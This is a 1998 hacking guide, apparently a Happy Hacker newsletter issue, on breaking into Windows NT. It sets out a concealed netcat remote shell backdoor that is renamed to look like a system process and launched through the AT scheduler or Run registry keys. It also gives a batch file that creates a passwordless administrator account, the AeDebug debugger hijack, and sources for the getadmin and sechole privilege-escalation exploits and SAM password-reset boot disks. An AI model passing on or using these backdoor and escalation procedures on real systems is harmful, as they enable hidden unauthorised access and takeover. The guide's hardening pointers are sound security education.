IWS - The Information Warfare Site
News Watch Make a donation to IWS - The Information Warfare Site Use it for navigation in case java scripts are disabled

    


__________________________________________________________

GUIDE TO (mostly) HARMLESS HACKING



Vol. 3 No. 10  Part 2



How to Break into Windows NT: Backdoors and Practical Jokes

____________________________________________________________



by keydet89@yahoo.com





[Backdoors and Practical Jokes]



Creating backdoors is how you can insure your ability to return to the

system at will.  This is almost a black art when dealing with Un*x

systems, and it can also be done on NT.



netcat, from Weld Pond, takes advantage of any user's ability to use

a local port.  netcat is a command-line utility that has several

switches used to configure it's operation.  This makes netcat, combined

with a properly configured command-line launched from a batch file,

an excellent choice for a backdoor.

(get netcat for NT from http://www.l0pht.com/weld)



The batch file needs to contain:



nc -L -d -p [port] -t -e cmd.exe



L  tells netcat to open keep listening after the current

  session terminates

d detach - don't open a DOS window when running (IMPORTANT)

p which port to bind to

t enable telnet negotiations

e command to execute upon connection



Copy this command line into a batch file named "runnc.bat" or

something similar.  Then copy both the netcat executeable file and

the batch file to a directory that is in the PATH on the target

machine...c:\winnt\system32\ is a good place to hide them.  Another

little trick to keep in mind is to rename the netcat executable from

'nc.exe' to something innocuous, like 'winlog.exe' (and make sure to

make the appropriate changes to the batch file).  That way, when you

or your buddy opens the TaskList, there won't seem to be any 'unusual'

programs running.  Run the batch file on your own machine, and open

the TaskList (right-click on the TaskBar, and choose TaskList)...



Once this batch file is run, all you need to do is connect via telnet,

or netcat in client mode:



c:\>nc -v [ipaddress of target] [port]



So how do you run this batch file?  By default, NT doesn't have an

interactive telnet server installed so that you can just log in, so

what do you do?  Well, there is a great little service called the

Schedule (or 'AT') service, which lets you schedule programs to be

run at a later date.  To see if your Schedule service is running,

you can either click Control Panel -> Services, and check it, or

if you have Perl installed (see above), you can run the following

script to see if the service is running, and if not, start it:



-----  begin script  -----

# atchk.plx

# Script checks to see if AT service is running on local

# machine...if not, starts it.  Minor modifications will

# allow you to do the same thing on a remote machine, once

# have successfully completed the IPC$ connection and have

# Administrator rights.

#

# usage: perl atchck.plx



use Win32::Service;

use Win32;

my %status;



Win32::Service::GetStatus('','Schedule', \%status);

die "service is arealdy started\n" if ($status{CurrentState} == 4);



Win32::Service::StartService(Win32::NodeName( ),'Schedule') || die

"Can't start service\n";



print "Service started\n";

#**Note:  This script was modified from:

#http://www.inforoute.cgs.fr/leberre1/perlser.htm

-----  end script  -----



Note:  Only Administrators or members of the Administrators group can

run the AT command.



Once installed, the 'runnc.bat' file can be executed via the AT command.



The necessary syntax for the AT command is:



AT [\\computername] [time] "command"



or more particularly:



AT [\\computername] [time] runnc.bat



References to commands can be hidden in various places within the

registry, set to run when a user logs in:



HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices



HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run



Note:  This last key is where you will find things like AOL's

Instant Messenger.  The install puts the reference to the app there,

but you won't find it in your StartUp box...



Here's another little exercise that you should run on your own machine

first, and then try copying it over to a friend's machine and running

it via the AT command.  The batch file below uses commands that are

native to NT to create a new user account, then make that user a member

of the Administrator group:



-----  begin batch file  -----

@echo off

net user Admin /add /expires:never /passwordreq:no

net localgroup "Administrators" /add Admin

net localgroup "Users" /del Admin

-----  end batch file  -----



What are some other neat little tricks to try?  Get Netbus from

http://netbus.hypermart.net/ .  This little program is similar to

Back Orifice, and it runs on NT.  (Visit the makers of Back Orifice

at http://www.cultdeadcow.com/)



Okay, so you and your 'leet buddies have played around with each

other's machines via the Internet, and pretty much walked through the

exercises listed above.  Now, what are some local 'attacks' that you

can run against your own machine?



[Local Attacks]



Let's say you have a couple of accounts on your NT box, at least one

with Admin rights, and one or two others with user rights.  You've

already run through the password cracking exercise and seen how easy

it is to get the 'SAM._' file and crack it.  So what else can you do?



Well, you try the 'getadmin' exploit.  This exploit consists of a

program and .dll file that will add the user to the Administrator group.



Get the necessary files from:



http://www.nmrc.org/files/nt/index.html



The Microsoft site has a hotfix for the "getadmin" exploit, located

at:



ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/

nt40/hotfixes-postSP3/getadmin-fix/



General information on security problems addressed by Microsoft

can be found at:



http://www.microsoft.com/security/issues.htm



For more information on the 'getadmin' exploit, go to:



http://www.ntsecurity.net



and search for 'getadmin'.



All you need to do to test this exploit is log onto your system via

a user account, copy the files into a directory, and run getadmin.exe.



Another local exploit similar to the "getadmin" exploit has popped up.

The exploit works like this:  the user runs a program called

"sechole.exe" and the final result (possibly after a reboot) is that

the user now has administrator rights!  For more information on this

and the zipped archive "sechole.zip", go to:

http://www.technotronic.com/microsoft.html



A variation on this exploit involves the Registry setting the

determines what the default debugger (the program run when a user mode

program crashes) is run.

Usually, the setting is:

Hive: HKEY_LOCAL_MACHINE

Key:  \Software\Microsoft\Windows NT\CurrentVersion\AeDebug

Value: Debugger

Data Type: REG_SZ

Default Value: drwtsn32 -p %ld -e %ld -g



The "Everyone" group has the ability to set the value of this key, and

is essential how you can exploit it.  The debugger runs in the security

context of the crashed application, so all you need to do is change the

Default Value (via 'regedit') to point to the User Manager, and then

crash one of the services that are running.  Then you can add accounts

to the User Manager...even to the Administrator group.



*******************************************************************

NEWBIE NOTE:  Before any changes are made to the Registry, make

sure that you make a backup of your current Registry using the

"rdisk /s" utility.  You can make changes to the Registry by clicking

Start -> Run, and entering either 'regedit' or 'regedt32'.  Before

you attempt any of this, read the files pertaining to the Registry

from the Rhino9 site (http://207.89.195.250/texts/), the "Hacker's

Modern Desk Reference" (http://www.antionline.com/SpecialReports/MHD/)

and even "Hardening NT" (http://pw2.netcom.com/~honeyluv/index.html).

*******************************************************************



Another local exploit that you can attempt uses the NTFSDOS utility,

which is nothing more than a bootable DOS diskette that can read (but

not write to) NTFS partitions.  This would potentially allow an attacker



to make off with copies of systems files, to include the SAM database.

The folks at Systems Internals (http://www.sysinternals.com) have not

only an NTFSDOS utility available, but also some tools that give the

user limited write capability.  SysInternals also has NTRecover and

NTLocksmith, along with a variety of other useful tools.



Get a copy of the utility, and try booting your own system with the

diskette in the A:\ drive.



There is a nifty little utility available, one that is essentially a

Linux boot disk:



http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html



The utility comes with rawrite.exe, so that DOS and Windows users can

download the utility and create the Linux boot disk.



The utility is a NTFS-bootable minimal kernel, with a small program

that allows the user to change any password in the SAM database.

Alternatively, you can find the Linux binary file (without the

rawrite.exe utility) at:



http://www.nmrc.org/files/snt/index.html



called bootdisk.bin, and according to the description, this is the

file you are interested in.  You will still need to get a copy of

rawrite.exe, in order to write the information to a diskette in a

useable form.



Carefully read the instructions on the web page for the utility

(listed above) and if you are feeling especially '31337', try it out

against your own system.



[Final Words]



By now you should be familiar with some of the methods used to attack

and compromise an NT system.  Hopefully, you have seen fit to try out

the exercises on your own system, or against a friend's system (with

permission, of course).  And it should start becoming clear what it

takes to secure a system from attack.  The first step is to become

familiar with various exploits by regularly visiting such sites as

RootShell (http://www.rootshell.com), the ISS X-Force site

(http://www.iss.net/xforce), NTSecurity (http://www.ntsecurity.net),

and NTBugTraq (http://www.ntbugtraq.com).  Then go to the Microsoft

Support (http://support.microsoft.com) and Security

(http://www.microsoft.com/security) sites to see what the 'official'

fixes are...the NTBugTraq site does a great job of keeping track of

the latest hotfixes, and which ones are obsolete.  The Microsoft Support

site is especially useful, because you can search for information or

specific KnowledgeBase articles, and print out those that you find

useful.  The "Hardening NT" document from Santeria Systems

(http://pw2.netcom.com/~honeyluv/index.html) provides an excellent

guide for protecting your system, complete with references to the

appropriate KnowledgeBase article for each step.  Finally, Microsoft

maintains a list of security bulletins at:

http://www.microsoft.com/security





_______________________________________________________________________

Where are those back issues of GTMHHs and Happy Hacker Digests? Check out

the official Happy Hacker Web page at http://www.happyhacker.org.

We are against computer crime. We support good, old-fashioned hacking of the

kind that led to the creation of the Internet and a new era of freedom of

information. But we hate computer crime.  So don't email us about any crimes

you have committed!  

To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless

Hacking, please email hacker@techbroker.com with message "subscribe

happy-hacker" in the body of your message. 

Copyright 1998 keydet89.  You may forward, print out or post this

GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave

this notice at the end.

_________________________________________________________



Carolyn Meinel

M/B Research -- The Technology Brokers

http://techbroker.com